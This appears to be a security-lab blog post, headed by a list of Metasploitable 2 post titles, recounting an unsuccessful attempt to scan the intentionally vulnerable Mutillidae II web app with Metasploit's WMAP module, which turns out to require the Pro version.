Metasploitable 2: Java RMI (Remote Method Invocation)

Metasploitable 2: Port 1524 ingreslock Backdoor

Metasploitable 2: Port 2121 – ProFTPD 1.3.1

Metasploitable 2: Port 3306 MySQL

Metasploitable 2: Port 3632 distccd Exploit and Privilege Escalation

Metasploitable 2: Port 5432 – PostgreSQL

Metasploitable 2: Port 5900 – VNC

Metasploitable 2: Port 6000 – X11 Server

Metasploitable 2: UnrealIRCd IRC daemon

Metasploitable 2: Port 8787 Open and Unknown

Mutillidae II: Metasploit WMAP Web Scan

Having completed my incursion into Metasploitable 2, I’m beginning my foray into Mutillidae II.

Before starting the manual hands-on stuff I thought I’d throw some automated scanners at the web app for fun and see what results they might generate for me.

Mutillidae version 2.6.5 is hosted on my Windows 7 system using XAMPP, and I’m scanning from Kali Linux.

I was keen to use Metasploit for this and discovered the WMAP module and followed instructions given here.

Once the scan was complete I looked for vulnerabilities but Metasploit came back empty.

I followed the instructions given in the video below:

And Metasploit still generated no vulnerability results; however, looking at this video closely, I noted that the professional version is used.

Looking back through the output generated during the scan, there appear to be errors that begin with /opt/metasploit/apps/pro, which indicates the “Pro” version is needed for this.

Looking at Metasploit’s web GUI and clicking the “Web Apps” tab, it talks of upgrading to the Pro version for use.

Metasploit’s website details the differences between the versions, and it’s clear that web app testing only comes with the Pro version.

Although it’s a shame there is no Metasploit feature for web app testing in the community version, there are plenty of open-source scanners, and Metasploit’s free version does come packed with goodies.
